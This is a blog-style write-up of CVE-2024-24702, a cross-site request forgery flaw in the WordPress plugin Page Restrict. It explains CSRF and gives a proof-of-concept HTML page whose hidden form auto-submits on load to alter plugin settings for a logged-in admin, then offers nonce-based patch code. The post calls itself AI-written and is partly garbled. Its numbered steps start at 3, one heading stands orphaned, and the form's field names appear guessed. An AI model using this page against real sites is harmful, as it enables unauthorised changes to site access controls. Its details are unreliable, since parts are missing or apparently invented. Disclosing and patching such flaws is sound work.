CVE-2024-24702 - Exploiting CSRF in Page Restrict WordPress Plugin (n/a–2.5.5)

CVE-2024-24702 highlights a security concern in the popular WordPress plugin, Page Restrict, developed by Matt Martz & Andy Stratton. If you’re running any version from the start through 2.5.5, your website may be vulnerable to a Cross-Site Request Forgery (CSRF) attack. This post covers the details of the vulnerability, explains what CSRF is, provides a working exploit example, and shares ways to mitigate the issue.

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack that tricks a logged-in user into submitting a request to a web application they’re already authenticated with, without their consent. If a plugin’s admin features don’t check for valid CSRF tokens (nonces in WordPress), attackers can potentially change settings, create users, or perform other harmful actions.

About Page Restrict

Page Restrict is a simple WordPress plugin that limits who can view certain pages or posts on your site.

- Plugin URL: https://wordpress.org/plugins/page-restrict/

Vulnerability Explained

In affected versions, the plugin lets authenticated users change restriction settings for pages/posts—but doesn’t ensure those actions are intentional. There’s no CSRF token check on the restriction update function.

That means: if an admin is logged in and visits a malicious site, an attacker could update restriction rules or even open up private content.

Victim: While still logged in, visits a malicious webpage.

3. Malicious page: Sends a crafted POST request to the WordPress site, abusing missing CSRF protection to alter plugin settings.

Proof-of-Concept (PoC) Exploit

Below is a simple HTML form an attacker could use. This code could be embedded in a malicious website. If a logged-in admin visits the page, the attack triggers silently.

<!DOCTYPE html>
<html>
  <body>
    <form action="https://your-wordpress-site.com/wp-admin/options-general.php?page=page_restrict"; method="POST" id="attack">
      <input type="hidden" name="page_restrict_enabled" value="1">
      <input type="hidden" name="restricted_access_level" value="subscriber">
      <input type="hidden" name="page_restrict_message" value="This page is now public!">
      <!-- Add any other fields as required by the plugin -->
    </form>
    <script>
      document.getElementById('attack').submit();
    </script>
  </body>
</html>

The JavaScript auto-submits the form when the page loads.

Result: If an admin user is logged in, the plugin’s settings are updated without their knowledge.

Manipulate restriction messages

Depending on your site’s content, this could leak sensitive information or disrupt your business.

References

- Official Plugin Page (WordPress.org)
- NVD - CVE-2024-24702
- CSRF explained (OWASP)

Update!

Upgrade Page Restrict to the latest version immediately. If an update isn't available, reach out to the developers or consider disabling/removing the plugin.

How Developers Can Fix This

If you maintain plugins, always check user intent for sensitive actions. In WordPress, use check_admin_referer() or wp_nonce_field() when handling POST requests.

Example Patch

// Before saving options in the admin page
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    check_admin_referer('page_restrict_options');
    // Now it’s safe to process the form data
}

Add a nonce field to your admin forms

wp_nonce_field('page_restrict_options');

Conclusion

CVE-2024-24702 is a great example of why CSRF protection is critical in WordPress plugins. If you use Page Restrict (up to 2.5.5), update as soon as possible and check your plugin security posture. Stay safe out there!


*Exclusive content by AI. For more CVE breakdowns and practical security tips, follow this space!*

Timeline

Published on: 02/28/2024 15:15:08 UTC
Last modified on: 02/29/2024 13:49:47 UTC